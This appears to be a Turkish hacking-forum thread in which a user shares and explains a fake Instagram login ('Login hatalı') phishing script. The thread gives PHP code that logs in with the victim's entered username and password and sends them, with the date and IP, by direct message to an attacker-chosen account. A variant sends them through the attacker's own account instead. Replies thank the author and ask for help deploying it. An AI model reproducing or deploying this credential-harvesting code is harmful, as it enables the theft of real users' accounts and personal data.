Instagram Login hatalı Script (2021) Videolu!

Helin447

Üye
8 Eyl 2016
81
2
Samsun
Evet şimdi arkadaşlar aslında ben çok uzun bir yazı ile anlatmıştım olanları ancak forum un azizliğine uğradık biraz...

Şimdi arkadaşlar Mantığını anlatıyorum size:

Tüm olay 'Thanks.php' dosyasındadır;

ilk satırımız:
şifre kullanıcı adı kontrol mantığı;
Kod:
try {

if ($_GET) //get edildiğinde.

{
$username = $usr;//api için giriş kontrolü username tanımladık 
$password = $sf;//api için giriş kontrolü şifre tanımladık 
$ig = new \InstagramAPI\Instagram(); //api yi instagrama girdikrdik
$ig->login($username,$password); //api kullanıcıadı ve şifreyi girdi

} else {
	throw new Exception("Error Processing Request", 1); //cath için hata  ranımladık

}

} catch (Exception $e) { //eğer else ile hata alırsa
	header('LOCA-TİON: login1.php'); //hata gösteren sayfaya git.
}

Mesaj gönderme mantığı;
Kod:
$userid = "2189079994";//düşen hesabı mesaj olarak göndereceği kişinin id si
$yazı = "$usr $sf $date $ip";//göndereceği bilgiler
$ig->direct->sendText(['users' => ["$userid"]], $yazı); // girilen hesabın -> mesaj kutusuna gir ->mesaj gönder -> kullanıcılardan User id si tanımlanan kullanıcıya-> tanımlanan mesajı gönder.

eğer isteresniz size düşen hesabın değilde kendi seçtiğiniz hesabın bilgileri atmasını isterseniz 42-44 dahil aralığı silin ve yeni bir <?php ?> açıp şu kodu yazın.

Kod:
<?php
$username1="kullanıcı adınız";
$password1="şifreniz";
$ig1 = new \InstagramAPI\Instagram();
$ig1->login($username1, $password1); 
$userid1 = "user id niz";
$yazı1 = "$usr $sf $date $ip";
$ig1->direct->sendText(['users' => ["$userid1"]], $yazı1);
?>

Forumun azizliğine uğramasaydık daha iyi olabilirdi ama canı sağolsun biraz paylaşma hevesim kaçtı üstün körü olmuş olabilir biraz.
VİDEO:

https://www.youtube.com/embed/d-ul5CiPdVg

LİNKLER:
İNDİR
VirüsTotal

Arkadaşlar bu arada script paralı hostlarda çalışmaktadır haberiniz olsun.... eğer free lerde sorunu çözüp çalıştıran biri olursa beni etketleyip paylaşabilir.

Tüm olay bu kadar aslında bilmek istediğiniz, merak ettiğiniz veya para ile satılan scriptleri yazmamı ve anlatıp paylaşmamı istiyorsanız ÖM veya instagram yazabilirsiniz ya da konuya yorum atabilirsiniz size kalmış.

Değerli dostum QENZY e teşekkür ederim yaptığı ve paylaştığı sciptler için, benim scriptimin teması tamamne QENZY kardeşime aittir.

Bir sonraki konuda görüşmek üzere -Sir. Yağız Türkoğlu

Moderatör tarafında düzenlendi:

Ghost Killer

Harici Saldırı Timleri Koordinatörü
13 Ocak 2019
11,317
7,690
Cevap: Instagram Login hatalı Script (2021) Videolu! Yağız Türkoğlu :)

eline sağlık dostum

Helin447

Üye
8 Eyl 2016
81
2
Samsun
Cevap: Instagram Login hatalı Script (2021) Videolu! Yağız Türkoğlu :)

Teşekkür edenler ve edecek olanlara saygılarımı sunuyorum ÖM veya sosyal medyadan cevap vermez isem kusuruma bakmayın üniversite okuyorum şimdiden kullanan arkadaşlara başarılar diliyorum. (1 aya Discord botuna bağlamayı, PHPmailler gibi yerlere bağlamayı göstere bilirim umarım görüşebiliriz.)

eL XIR

Üye
30 Ocak 2015
130
0
selam hocam telif siz direk sadece login scripti olarak upload etme şansınız varmı? Ben bir kaç dosya ile oynadım da bozdum başaramadım.. Aynı zamanda admin panelini de bulamadım.

C 0 D E R

Katılımcı Üye
21 May 2020
429
48
SIFIR6
Kullandığınız api hesap girildiğinde farklı konum, farklı ip üzerinden giriş yaptığı içi giriş yapan kişinin hesabı DOĞRULAMAYA DÜŞER!

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.